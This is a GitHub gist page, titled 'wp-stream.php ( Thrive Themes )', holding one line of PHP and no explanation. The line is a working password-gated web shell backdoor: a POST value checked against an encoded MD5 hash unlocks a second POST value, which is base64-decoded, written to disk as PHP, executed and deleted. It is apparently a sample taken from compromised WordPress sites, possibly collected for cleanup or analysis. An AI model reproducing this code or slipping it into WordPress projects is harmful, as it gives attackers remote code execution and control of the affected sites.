Skip to content

Instantly share code, notes, and snippets.

@magefix
Created April 9, 2021 11:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save magefix/a2fba9e4df788a1f7fffdb2ae45f3626 to your computer and use it in GitHub Desktop.
Save magefix/a2fba9e4df788a1f7fffdb2ae45f3626 to your computer and use it in GitHub Desktop.
wp-stream.php ( Thrive Themes )
<?php if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment